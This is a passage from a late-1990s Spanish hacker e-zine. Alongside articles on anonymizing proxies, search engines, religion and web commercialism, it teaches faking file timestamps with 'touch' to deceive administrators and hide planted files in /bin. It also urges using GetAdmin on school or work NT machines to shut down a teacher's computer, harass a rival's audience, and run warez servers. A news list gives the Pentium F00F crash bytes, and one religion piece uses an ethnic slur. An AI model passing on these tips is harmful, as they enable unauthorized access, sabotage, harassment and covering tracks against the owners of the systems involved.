1.22 (e inferiores)= Menu Options->Prefereces->Proxy (Resetear?) =Netscape 2.0 (y superiores)= Menu Options->Network Preferences->Proxy =Netscape 4.x = Menu Edit->Preferences...->Doble clik en Advanced->Clik en Proxies-> (en la derecha) marcar Manual Proxy Configuration -> Click en boton View =Internet Explorer 2.0 for windows = Clikea con el boton derecho sobre el icono->selecciona Properties->Advanced ->Use proxy server-> http://algun_proxy.com:8080 =Internet Explorer 3.0 for windows = 1)Menu View->Options->Connection-> 2)Marcar Connect through a proxyserver 3) clikea en Settings y pone http://algun_proxy.com:8080 =Internet Explorer for Mac OS= Menu Edit->Options->Proxy->http://algun_proxy.com:8080 =NCSA Mosaic for Unix 2.4 (o superior)= Se deve setear la variable de entorno http_proxy a http://algun_proxy.com: esto depende del shell: csh -> setenv http_proxy http://algun_proxy.com:8080 bash-> export http_proxy='http://algun_proxy.com:8080' =NCSA Mosaic for Macintosh 2.0 (o superior)= Menu Options->Preferences->Use Cern proxy service->Gates Setear el HTTP gate a algun_proxy.com y en el segundo casillero el port =Enchanced Mosaic for Macintosh= Menu Edit->Prefereces->Proxy server poner http://algun_proxy.com:8080 =Lynx for Unix 2.3 o superior = Igual que el NCSA MOSAIC hay que setear la variable de entorno.(ver arriba) Para configurar en otros programas buscar en la ayuda y en los menues o se pone la URL o la direccion y el puerto. (IV) ¿Que proxies puedo usar? Hace un tiempo se hizo famoso el www.anonymizer.com, este brinda el servicio de anonimizacion, claro se hizo pago y tenemos un retardo de unos segundos cada vez que lo usamos si no abonamos. Pero existen muchos otros proxies en el mundo que nos pueden servir, algunos son reservados para determinados usuarios, otros filtran, algunos dicen que borran sus logs semanalmente, otros que se los dan a la justicia si se los piden, unos son mas rapidos otros son lentos. Por eso es cuestion de buscar y encontrar uno que nos brinde seguridad y velocidad (servicio y limpieza?:) , FTP y HTTP como minimo. Si encuentran un proxy fijense de que tipo es, generalmente se ven cosas com FTP:1030 SOCK:8010 HTTP:8080 esto indica en que puerto soporta cada servicio. ALGUNOS PROXIES EN EL MUNDO: (AUSTRALIA-ALEMANIA-BELGICA-USA-INDONESIA-ISRAEL-ITALIA-GRECIA-ESPAÑA-HOLANDA) web.mit.edu:80 (funciona siempre pero es 'conocido') win.tue.nl:8080 (dejo de funcionar) proxy.magusnet.com:8080 (no funciona-probar) proxy.voz.cz:8080 (probar) proxy.di.uoa.gr:8080 proxy.aljan.com.au:8080 socks:8010 (restringido?) white.aljan.com.au:8080 socks:8010 (restringido?) wwwproxy.weizmann.ac.il:8080 Proxy.wasantara.net.id:8080 o 3128 202.159.81.75 (funciona bien) proxy.netura.net.id:8081 proxy.belnet.be:8000 proxy.tarheel.net:8080 [ de los siguientes no se nada, averiguen los puertos y demas datos] frankfurt.www-cache.dfn.de cache.nic.surfnet.nl koeln.www-cache.dfn.de proxy.cineca.it proxy.imaginet.be proxy.rediris.es proxy.interpac.be proxy.skynet.be [ si conocen mas o mejores mandenme mail] Prueben todos los que puedan y elijan, les recomiendo visitar la pagina web de cada uno para informarse que tipo de proxy es y como manejan los logs. Recuerden que sites como hotmail nos rebotan si usamos proxies conocidos, prueben con otros y listo! Para comprobar que realmente estan ocultando su procedencia pueden hacerlo en la misma pagina de Raregazz, en la parte de mensajes anonimos aparece su direccion IP, prueben con y sin proxy. Para FTP conectence con algun servidor que les diga "Hola [tu IP] te estamos vigilando" :) que vigilen... "Desde que uso proxies soy mas feliz" ---|--- =VoraX= vrx@bigfoot.com {llave PGP a pedido}--= 30/12/97 ============================================================================== °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ Comando TOUCH - cambiar hora y fecha de un archivo Este es un comando muy util en todos los hack's. Podemos cambiar la fecha y hora de acceso/modificacion de un archivo al que tengamos permiso de escritura ( o r00t ;) ). Esto sirve para confundir al admin si detecta nuestros archivos, para engañar a algunos programas de chequeo, para que si insertamos algo en /bin no desentone con los demas comandos y muchos usos mas. sintaxis: touch [-acfm] [-r reference-file] [-t MMDDhhmm[[CC]YY][.ss]] [-d time] [-time={atime,access,use,mtime,modify}] [--date=time] [--file=reference-file] Primero especificamos: -a = Solo cambia la f/h del ultimo acceso al archivo. -m = Solo cambia la f/h de cuando se modifico el archivo. -t MMDDhhmm[[CC]YY][.ss] = especifica los 'datos temporales' MM= mes DD=dia hh=hora mm = minutos OPCIONALES: CC=siglo YY=año .ss=segundos -r archivo_de_referencia =Usa los 'datos temporales' del archivo_de_referencia (esto es lo basico, hay mas) ejemplos: unix:~$ls -l -rw------- 1 vorax users 3773 Nov 15 10:08 mbox -rw-r--r-- 1 vorax users 3717 Dec 16 21:34 pedo unix:~$ls -lec -rw------- 1 vorax users 3773 Sat Dec 13 20:21:36 1997 mbox -rw-r--r-- 1 vorax users 3717 Mon Dec 16 21:34:10 1997 pedo (si queremos dejar igual pedo a mbox): unix:~$touch -r mbox pedo (toma mbox como referencia) unix:~$ls -l -rw------- 1 vorax users 3773 Nov 15 10:08 mbox -rw-r--r-- 1 vorax users 3717 Nov 15 10:08 pedo unix:~$ls -lec -rw------- 1 vorax users 3773 Sat Dec 13 20:21:36 1997 mbox -rw-r--r-- 1 vorax users 3717 Mon Dec 16 21:34:10 1997 pedo F/H especifica: (12/05 20:30 hs) (año actual) unix:~$ touch -t05122030 prueba unix:~$ ls -le prueba -rw-r--r-- 1 vorax users 5 Mon May 12 20:30:00 1997 prueba 12/05/1995 20:30hs: unix:~$ touch -t051220301995 prueba unix:~$ ls -le prueba -rw-r--r-- 1 vorax users 5 Fri May 12 20:30:00 1995 prueba Sin parametros pone el tiempo actual: unix:~$ date Tue Dec 16 00:47:22 EDT 1997 unix:~$ touch prueba unix:~$ ls -le prueba -rw-r--r-- 1 vorax users 5 Tue Dec 16 00:47:07 1997 prueba =========================================================================== =VoraX= 12/97 - vrx@bigfoot.com °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ ╔════════════════════╦══════════════════════════════════════════════════════╗ ║ ║ +++ Azum Lord +++ ║ ║ LAS ║ ║ ║ POSIBILIDADES EN ║ http://www.xoom.com/logos/wlm.htm ║ ║ WINDOWS NT ║ AzumLord@bigfoot.com ║ ║ -primera parte- ║ ║ ╚════════════════════╩══════════════════════════════════════════════════════╝ ╔════════════════╗ ║ CONTENIDOS ║ ╚════════════════╝ 1.═══════════════════════════════>> Disclaimer <<═════ 2.═══════════════════════════════>> Introduccion <<═════ 3.═══════════════════════════════>> Posibilidades <<═════ 4.═══════════════════════════════>> Acciones <<═════ ╔════════════════════════════════════════════╗ ║ 1. DISCLAIMER.- ║ ╚════════════════════════════════════════════╝ El contenido de este texto esta solamente destinado a usos educacionales, de investigacion y de desarrollo. En ningun momento el creador de este texto se hace responsable de los daños causados debido a un mal uso de el mismo. ╔════════════════════════════════════════════╗ ║ 2. INTRODUCCION.- ║ ╚════════════════════════════════════════════╝ Este articulo trata sobre algunas de las posibilidades que se pueden explotar a Windows NT, y talvez con este articulo se te prenda el foco y se ocurran algunas ideas similares o mejores porque como vas a ver se pueden hacer muchas cosas con este Sistema Operativo. ╔════════════════════════════════════════════╗ ║ 3. POSIBILIDADES.- ║ ╚════════════════════════════════════════════╝ 1. Alguna vez se te ha ocurrido que seria divertido que mientras el profesor de computacion esta dando su clase con el cañon, tu sabes ese aparatito que se conecta a la computadora y la proyecta en el pizarron el profesor te esta explicando por 11a vez los comandos del MSDOS, te imaginas que a mitad de esto la computadora se apaga };->. 2. O que uno de tus enemigos va a dar una conferencia estan las personalidades mas importantes y el tan seguro de su conferencia que cree que todo le va a salir perfecto y a media conferencia llega un mensaje rayandosela a todo el publico presente };->, ups eso si que seria ridiculizante. 3. O si alguna vez hiciste un trabajo en una computadora de tu escuela/trabajo y por alguna razon lo tuviste que dejar ahi y por alguna desconocida razon no vas a estar, pero ese mismo trabajo era un trabajo de equipo y para colmo sales de viaje, le hablas a tu compañero de equipo, le das la IP de esa computadora, un login y un passwd y desde la comodidad de su hogar/trabajo el saca el archivo!!!!!!! 4. Te gusta el warez y necesitas una computadora que este siempre este conectado a internet, tu sabes para intercambiar juegos/programas/o lo que sea, entonces agarras una computadora de tu escuela/trabajo y la conviertes en un servidor ftp. ╔════════════════════════════════════════════╗ ║ 4. ACCIONES.- ║ ╚════════════════════════════════════════════╝ 1. Esto se puede hacer de una forma muy sencilla lo primero que necesitas es el GetAdmin ( disponible en la pagina de RareGazZ ) y un programita que se llama BootAdmin este programita se puede conseguir en www.bhs.com es totalmente GRATIS pero este programa puede apagar solo las computaras donde tu seas administrador y esto ultimo es facil de hacer con el getadmin. 2. Esto se puede hacer con un programita que se llama NT_Hail este programa permite enviar mensajes a cualquier computadora conectada a tu dominio incluyendo la del servidor. Este programa se puede conseguir en www.filez.com 3. Esto se puede hacer con un telnetd daemon y hay varios como el de Ataman que es gratis, con este programa puedes convertir cualquier computadora en un servidor puedes configurarlo para el numero de usuarios que desees y muchas otras opciones mas. 4. Esto se puede lograr con el SERV-U que convierte cualquier computadora en un servidor FTP este programa lo puedes encontrar en mi pagina. ╔════════════════════════════════════════════╗ ║ 5. CONCLUCION.- ║ ╚════════════════════════════════════════════╝ Como puedes ver las posiblidades son muchas solo es cuestion de imaginacion, quiero volver a decir que las posibilidades de arriba son solo algunas. °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ MAS BICHOS EN INTERNET ======================== IP BUG Un usuario de internet identificandose como m3lt reporto un BUG que inmediatamente congelaria maquinas Windows (3.11/95/NT). Cuando se indago, varios sistemas fueron encontrados como afectados aparte de Windows. Este error es causado en los sistemas que no detectan un error cuando se recibe un SYN spoofed (falso) donde la direccion destino y el puerto destino son el mismo que la fuente. IRIS Buffer Overflows Silicon Graphics aviso de un error de sobrecarga en los buffers en df, eject y libXt. El error se extiende hasta con Magic Desktop. Los permisos que deben usarse para evitar el error son: # /bin/chmod 500 /usr/sbin/syserr # /bin/chmod 500 /usr/lib/desktop/permissions Parches pueden obtenerse en: sgigate.sgi.com ~ftp/security ~ftp/patches. TCP Fragment Overlap Un error en Linux, Windows NT y Windows 95 que permite que usuarios con malas intenciones estrellen el sistema. Cuando se re-ensamblan los fragmentos, se hace un test para ver si son muy largos. Pero, no se hacen tests para ver si el fragmento es muy pequeño. El resultado es que memcopy() es pasado a un numero negativo que causa un crash en la maquina. El exploit esta disponible por internet. Una version maliciosa del exploit original permite estrellar muchos sistemas al mismo tiempo. Microsoft Internet Explorer Ver.4 OverFlow Un anuncio sacado a la luz por L0pht Heavy Industries describe una sobrecarga del buffer en todos los programas que vienen con la suite IE4 como lo son el navegador y Outlook Express. Como no existen restricciones en cualquier link que contiene una URL del tipo "res:" permite a usuarios remotos ejecutar codigo haciendose pasar por el usuario ejecutando el software. Pentium Killer El siguiente codigo, cuando es alimentado a un Pentium ocasiona un Crash: F0 0F C7 C8 Cisco Passwords Para demonstrar lo simple que es el tipo de encripcion usado por cisco, se creo un programa en C y un shell Bourne que fue posteado a las listas de seguridad en internet. El tiempo de decripcion es menor a un segundo. Inseguridad NT Solar Designer ha sacado a la luz un papel documentando todas las formas en que se puede hackear, estrellar, crackear, etc. Un sistema NT. Root Remoto en BSD Secure Networks descubrio un exploit remoto que en algunos daemons de telnet BSD permiten obtener shell root. Exploit remoto en lpd Un agujero fue encontrado en el daemon lpd de BSD que permite la manipulacion remota de archivos, asi como tambien la habilidad de ejecutar comandos remotos para obtener un shell. Microsoft Internet Explorer Agujero de seguridad en Java Un problema de seguridad con serias ramificaciones ha sido descubierto. Los applets java no pueden (supuestamente) conectarse a otro sitio desde el cual son compilados, pero existe una forma de hacer esto. El agujero no es de Java, unicamente del navegador de Microsoft. Error en WinNT Este error permite a cualquier usuario estrellar el sistema u obtener privilegios de administrador. Peligro con Windows 95 Si surfeas la red usando el explorer de Microsoft desde una red NT corre peligro tu password (windows 95 no los encripta) si un atacante se mete al servidor NT. NTSecurity saca Red Button http://www.ntsecurity.com/RedButton/Red Button Red Button es una herramienta que te permite conectarte a cualquier maquina NT disponible, ver partes del registro, etc. Una utilidad que protege parcialmente es: http://ntbugtraq.rc.on.ca/david.htmfree L0pht saca L0phtCrack http://www.l0pht.com/advisories.htmlL0phtCrack L0phtCrack es una herramienta que te permite recuperar passwords NT usando diferentes metodos. ¿ estamos seguros ? °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ RELIGION Y OTRAS COSAS INSERVIBLES Recopilacion por el hereje mayor: RareTrip 1. Que diablos es esto??? 2. ¿Creo en dios? 3. ¿Crees en dios? 4. Juan Diego al estrellato Parte Uno. Que diablos es esto??? Por: RareTrip RareGaZz desde sus principios se obligo a brindar temas de polemica en sus bytes por eso este texto ha sido recopilado para su publicacion. Sentiremos mucha pena si perdemos lectores por este texto pero deben permitirnos la libre expresion y libertad de creencias asi como nosotros se las permitimos a ustedes. NADIE aqui dice que lo que crees es mentira! Nada mas te invitamos a razonar un poco sobre lo que haces y lo que das por verdadero. Al finalizar puedes olvidar esto... o aplicarlo en tu vida. Tu decides. Parte Dos. ¿Crees en dios? Por: Goethe ¿ QUIEN osaria decir: "Creo en dios" ? Puedes preguntar a sabios y sacerdotes, y su respuesta no parecera sino una burla dirigida al preguntador. ¿ QUIEN puede confesar: "Creo en el" ? ¿ QUIEN siendo capaz de sentir, puede atreverse a exclamar: "No creo en el" ? Aquel que todo lo abarca, aquel que todo lo sostiene, ¿No abarca, no te sostiene a ti, a mi, a el mismo? ¿No se extiende el cielo formando boveda alla en lo alto? ¿No esta la tierra firme bajo nuestros pies? ¿No se elevan las eternas estrellas mirando con amor? ¿No te contemplo yo clavando mis ojos en los tuyos? Y todo cuanto existe ¿No impresiona tu cabeza y tu corazon y se agita visible e invisible cerca de ti en un eterno misterio? Por grande que sea, llena de esto tu corazon, y cuando, penetrada de tal sentimiento, seas feliz, nombralo entonces como quieras, LLAMALE FELICIDAD, CORAZON, AMOR, DIOS. Para ellos no tengo nombre; el sentimiento es todo. El nombre no es mas que ruido y humo que ofusca la lumbre del cielo. Parte Tres. ¿Crees en dios? Por: Osho Yo no creo en creencias. Eso tiene que ser entendido primero. Nadie me pregunta ¿crees en el sol? ¿crees en la luna? Nadie me pregunta: ¿crees en la rosa? No hay necesidad, la puedes ver. La rosa existe o no existe. Solo se cree en ficciones, no en hechos. Dios es la mas grande ficcion que el hombre ha creado. Dejenme explicarles por que la gente ha creido en Dios. Una de las cosas mas significativas que hay que entender sobre la mente del hombre, es que la mente siempre anda buscando y preguntando sobre el significado de la vida, si la vida tiene algun sentido. Asi pues, el hombre ha venido buscando si la vida tiene algun sentido, y creo a Dios como una ficcion tratando de que asi la vida tuviera sentido, significado. Sin Dios, el mundo se vuelve accidental. Deja de ser una creacion de un Dios sabio que lo creo para tu desarrollo, tu crecimiento o para alguna cosa. Sin Dios, el mundo es accidental, sin sentido. Por lo mismo, el hombre crea todo tipo de ficciones -Dios, el Nirvana, los Cielos, el Paraiso, la Otra Vida despues de la muerte y hace todo un sistema religioso. Pero todo es una ficcion tratando de satisfacer ciertas necesidades psicologicas. Yo no puedo decir "Dios existe". Tampoco puedo decir "Dios no existe". Para mi no tiene sentido, es un fenomeno ficticio. ¿Cual es el significado de una rosa o de una nube flotando en el cielo? No hay ningun significado y sin embargo tienen una tremenda belleza. No tienen sentido. Un rio sigue fluyendo y lleva tanta alegria. ¡No se necesita que tenga ningun sentido! Como es, es suficiente. No creas ficciones. Una vez que creas una ficcion, tienes que crear mil y una ficciones para sostenerla fuera de la realidad. Por ejemplo: hay religiones que creen en Dios y hay religiones que NO creen en Dios. De modo que Dios no es una necesidad para las religiones. El Budismo no cree en Dios. El Jainismo no cree en Dios. Solamente hay tres religiones, las tres enraizadas en el Judaismo, que manejan la creencia en Dios: Cristianismo, Judaismo e Islamismo. Buda nunca creyo en Dios, no tenia necesidad de hacerlo. Tampoco Mahavira, y sin embargo sus vidas fueron tan divinas como puede ser la vida. No existe Dios sentado en los Cielos y creando el mundo ¿O piensas que Dios crearia un desorden como esto que llamas mundo? Si alguien ha creado este mundo debe haber sido el Diablo, no puede haber sido Dios. Sin embargo, viejas ficciones, repetidas millones de veces, empiezan a tener su propia realidad. ¡Y que clase de ficciones bobas pueden volverse "realidad" una vez que empiezas creyendo en ellas! Y solo por que lo dice la Biblia... Ya sabes la historia de Galileo. Cuando Galileo encontro que NO es el sol el que gira alrededor de la tierra, sino al revez, el Papa "infalible" le dijo "tienes que cambiarlo, porque la Biblia dice que el sol gira alrededor de la tierra. Y la Biblia no puede equivocarse porque ha sido escrita por Dios." Galileo era un hombre de un humor extraordinario y penso: "¿Para que discutir con estos idiotas?" Son los mismo que dicen todavia: "Todas las cosas son posibles para Dios". Una ficcion que tienen que sostener con otra y otra y otra ficcion. Y llegar al punto del absurdo. Eso es la Biblia: un absurdo completo. Parte Cuatro. Juan Diego al estrellato Por: RareTrip Mexicanos creidotes de la iglesia... les han mentido! Recuerdan Juan Diego? Aquel Indio que vio a la virgen en el cerro ese? Pues ahora resulta, que como la iglesia catolica mexicana quiere hacer Santo a ese personaje (o deberia decir leyenda?) han cambiado todo su linaje. Agarrense. Ahora resulta que Juan Diego era Nieto de un emperador mexica o algo asi. El caso es que era filosofo, pensador y poseia castillos con mas de 30 mujeres. Adios al mito del indio. Pero eso si, ahora ya casi es santo. ¿como creyeron que iban a hacer santo a un pinche indio mexicano? °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ BUSCADORES EN INTERNET En este articulo se pretende tratar algo que no es nuevo dentro de Internet, ni tampoco para muchos de vosotros, amables lectores, y es la necesidad constante de buscar y encontrar informacion, ficheros, personas y links dentro de la vasta red INTERNET. ¿Cuantos no hemos usado un buscador?. ¿Cuantos no nos hemos visto perdidos, viendo como nuestra direccion favorita cambia de lugar y no la encontramos?. ¿Quien no ha visitado una pagina Warez o de Craks y se ha encontrado que el archivo no se puede bajar por estar en una direccion anticuada o el sitio esta bloqueado?. ¿Quien no ha visitado la pagina de algun buscador hacker, situado en alguna pagina de nuestros amigos, para obtener informacion a lo buscado?. De un tiempo a esta parte se ha afianzado en la red los buscadores o motores de busqueda y no son servicios de modo texto estilo Archie, como se utilizaban antes, sino que estan programados para poder ser vistos por nuestros navegadores habituales. Basicamente la funcion, mas que la de ofrecer mera informacion, es la de hacer de nexo entre los proveedores de todo tipo de datos y sus consumidores. No hace muchos años los buscadores estaban menos evolucionados y se encargaban de encontrar un fichero, un punto en la red y tenian que ser desarrollados por personas "con mucha fe" porque no ganaban ni un duro, no siendo como ahora, que los mantienen y desarrollan con dinero y la publicidad que se hacen las empresas que lo montan y las cotizaciones en bolsa, como el caso de YAHOO, etc... Estas imagenes que te tienes que bajar,la publicidad, es el precio, tu tiempo, que tienes que pagar por usar un servicio gratuito, y aumentando con ello el tiempo, para obtener aquello que se busca y tu tarifa de Timofonica engorda, claro. Segun la dificultad que se precise para encontrar una cierta informacion, se usara un BUSCADOR o un MULTIBUSCADOR (muchos de ellos). El buscador tratara de encontrar la informacion solicitada por el usuario en su propia base de datos y si no son capaces de encontrarla, te presentan otros buscadores en los que puedas volver a intentarlo o bien el buscador indaga en alguna base de datos "amiga". El multibuscador no suele tener base de datos propia, sino que chupa info valiendose de los demas buscadores, indagando "a destajo" en los mismos y diciendote lo que han encontrado. Ningun buscador es mejor que otro, solo variara la situacion en la que nosotros nos encontremos para usar uno u otro. Si la informacion es facil de encontrar, los buscadores dan muy buenos resultados ofreciendote suficiente informacion sin saturarte con cientos de links. Si la informacion es dificil de encontrar es mejor utilizar un multibuscador por ser varios buscadores a la vez los que te hacen el trabajo y si daran respuesta a tus necesidades de info. Lo que debemos de hacer es utilizar un buscador, y si no nos da la informacion satisfactoriamente, utilizar un multibuscador. Ahora, tienes que tener mucho ojo para darte cuenta, de que tipo de informacion es la que te combiene obtener y que buscador vas a utilizar, por que todas las bases de datos de los mismos no son iguales,ni todos los buscadores son lo mismo, ya que unos estaran mas especializados que otros y ofreceran mejores resultados para una determinada busqueda. Te puede ayudar a determinar que buscador escoger el hecho de determinar el lugar que puede albergar la informacion requerida: el pais propio, una empresa internacional, nacional o regional, los grupos de noticias y sitios FTP. Si buscas una noticia o informacion nacional o local lo mejor es usar un buscador con base de datos nacional como Ozu, Ole y Sol, para España o Sbel y Mex-Web para Mexico. Si la informacion es internacional, lo mejor es usar un buscador nativo de ese pais o uno internacional o uno con la funcion especial de buscar unicamente dentro de servidores con la extension de un pais determinado como lo hace Hot-Bot (la mejor maquina de busqueda segun PcMagazine e Internet Lab) Hay otros buscadores con motores especiales usados para buscar personas y los buscadores de ficheros. Como metacrawler y Whowhere. No hay que desdeñar los listines telefonicos y paginas amarillas de Internet que potenciaran nuestras posibilidades de encontrar mayor informacion. Si a pesar de todo lo dicho no consigues encontrar lo que buscas, entonces usa el buscador de ficheros ARCHIE de toda la vida. Es bastante eficaz o utiliza los buscadores HACKER que te puedes encontrar en la web de los aficionados al undergrownd.Como: http://altavista.box.sk http://www.box.sk/neworder http://Mp3.box.sk Tambien se puede utilizar una base de datos muy buena en http://www.filez.com pero, sin lugar a dudas, el mas internacional es: http://altavista.digital.com (creo que es completisimo). ¿COMO MEJORAR LA BUSQUEDA EN ALTAVISTA? Usando: a) (" "): El texto encerrado entre comillas, se buscara tal y como figura entre las comillas. b) (+): Obliga a que la palabra introducida a continuacion figure en los documentos encontrados. c) (-): Obliga a que la palabra introducida a continuacion no aparezca en los documentos encontrados. d) (*): Actua de caracter comodin. Ejemplo: ======== 1) "escuela de montaña" + Barcelona - Madrid SI NO Este ejemplo buscara todas las paginas que digan escuela de montaña y Barcelona pero no Madrid. 2) "museos" + chiapas - mad* - bar* No palabras No palabras ¿COMO TRABAJAR CON LOS BUSCADORES? Normalmente incorporan un campo en el que debe de incluirse la o las palabras a buscar, como en el ejemplo anterior, que utiliza operadores booleanos, pudiendose solicitar que se muestre la informacion que contenga una u otra palabra, las dos juntas, o una de ellas, pero sin que aparezca la otra. Muchos de los buscadores permiten seleccionar el lugar donde se quiere buscar como CHIAPAS, BARCELONA o MADRID vistos arriva, (regiones o pais donde se encuentra el recurso que se precisa y nos ahorra tiempo porque el buscador tardara menos en ofrecer la informacion y el usuario tardara menos en filtrar todos los links que le son ofrecidos, ya que se ajustan a sus necesidades y hay menos que mirar.Tambien nos mostrara el nodo mas cercano a nuestra conexion, aunque esto no siempre aumentara nuestra rapidez), las News, sitios web, buscadores de personas. Otros estan divididos en secciones o areas como deportes, cultura, ocio, empresas, etc. ¿QUE BUSCADORES CONOCEMOS EN INTERNET? Pienso que esta es la pregunta de 1.000.000 porque la RED no para de crecer y crecer mas y mas todos los dias y todos los dias sale algo nuevo. CREA, CAMBIA DE SITIO, RENUEVA, BORRA Y DEBORA INFO SIN PARAR. Pero pongo algunos mas usados. BUSCADORES INTERNACIONALES ========================== www.altavista.digital.com.....Muy Completo y tambien en Español si lo deseas. www.hotbot.com................Localizacion de paginas por pais, fecha, etc. www.infoseek.com..............Redireccion por NetScape www.lycos.com.................Ficheros Gif, JPEG y MPEG. www.yahoo.com.................Por categorias y temas. www.excite.com................Busqueda por conceptos. www.webcrawler.com............Hace un Index de las paginas. www.magellan.com BUSCADORES EN ESPAÑA ==================== www.ozu.es www.ole.es www.sol.es www.glbalcom.es/indice www.donde.uji.es...............Relacion para web España. www.encuentrelo.com http://biwe.cesat.es www.fantastico.com trovador.combios.es BUSCADORES EN MEXICO ==================== http://rtn.net.mx/sbel/ http://mexico.web.com.mx/ BUSCADORES DE PERSONAS ====================== www.whowhere.com www.spanish.whowhere.com (el mismo de arriba pero en español) www.listin.com www.x500.rediris.es:8888/Mc=ES BUSCADORES DE FICHEROS ====================== www.filez.com www.ua.es:8080/internet/castellano/archie.html www.elibrary.com......................Buscar en libros, mapas, etc. http://ftpsearch.com/searchpage/indexA.html........... Busquedas en FTP's http://ftpsearch.ntnu.no/............................. Busquedas en FTP's SITES DE SHAREWARE =================== www.download.com......................Famoso, buscate los antivirus actuales. www.shareware.com.....................Base con mas de 160.000 programas. www.hotfiles.com www.tucows.com........................Todo Windows y comunicaciones (winsock) www.coast.net/simtel www.cdrom.com sunsite.unc.edu MULTIBUSCADORES =============== www.metacrawler.com www.designlab.ukans.edu/profucion www.robtex.com/search.thm www.cyber411.com LISTA DE SERVIDORES ARCHIE ========================== http://web.nexor.co.uk/archie.html NOTA DEL AUTOR ============== Quiero mencionar, que por lo que he visto, se tiende a usar y no abusar de los graficos y fotos, que tanto nos desesperan y relentizan nuestro PC, en las paginas destinadas al hacking, abundando en su lugar, una buena predisposicion para la informacion. Acondicinamiento de los fondos que le dan realce, visivilidad y mejor lectura de las letras o caracteres de dichos textos, y una mayor abundancia de informacion. UN SALUDO DE C. COLON °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ "World Wide Web = El Mercado mas grande del mundo." Por 12r43lOverdrive. Para RaregaZz. Cada dia nos acercamos mas al paradigma planteado por Gibson en su novela "Neuromante", la cual plantea una sociedad basada en una red global de informacion, que como en la realidad tiene muchas fallas y no es lo que en un principio se planteo como la "Supercarretera de Informacion". Ahora vemos el gran auge de tecnologias como Java, DHTML, VRML, ActiveX, Realaudio, entre algunas otras las cuales son aplicadas al Web (en algunos casos con gran acierto pero en algunos otros con un abuso de estos) para tener una interaccion con la red mas amigable y natural, aun recuerdo los viejos dias del Web, con simples y rapidos archivos HTML, navegando con NCSA Mosaic y obteniendo la informacion mas rapido y sin tantas demoras, esto con la desventaja de ser poco amigable y por lo general solo usada por gente relacionada con investigacion, sistemas y educacion. En la actualidad desde cientificos hasta amas de casa usan el web, con los beneficios y desventajas que esto conlleva. Creo que el web se ha convertido en un supermercado gigantesco, el cual ha pasado a manos de las grandes corporaciones y grupos con fines lucrativos, los cuales saturan los servicios de propaganda, esto ha llegado al punto de ser paranoico ya que en la mayoria de paginas encuentras propaganda y mas aun, proliferan las cookies a las que considero una invasion a la privacidad, es insoportable tener que estar cuidandose de ellas. Ahora otro tema muy importante es el acceso a la red, muchos proveedores ofrecen sus servicios teniendo equipos en mal estado y obsoletos para permitir un acceso rapido al web, aparte de la negligencia del departamento de soporte tecnico, es totalmente injusto pagar por un servicio en mal estado y ademas caro. Si uno quiere tener una pagina y correo electronico implica un costo extra, ademas de ser elevado, los proveedores ofrecen muy poco espacio para estos servicios, aunque existen servicios "gratuitos" como Geocities y Hotmail para paginas web y correo electronico respectivamente, muy poca gente sabe de su existencia y es estafada por una pagina de menos de 2MB y una cuenta de correo de similar capacidad, aparte del cobro del diseño de la pagina y de la configuracion de la cuenta en su PC. Para concluir, el Web se ha convertido en el negocio del siglo, si no preguntenle a DEC, Apple o Yahoo entre otros muchos, lo que en un principio fue creado como un medio de compartir informacion se ha transformado en un medio de lucro y abuso, claro aun se encuentra la suficiente libertad en el Web para conservar su espiritu pero la pregunta es: ¿Cuanto durara esta libertad?. 1998 12r43lOverdrive. Me despido deseandoles lo mejor. 12r43lOverdrive. "Muerte a la opresion y a los opresores". °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° 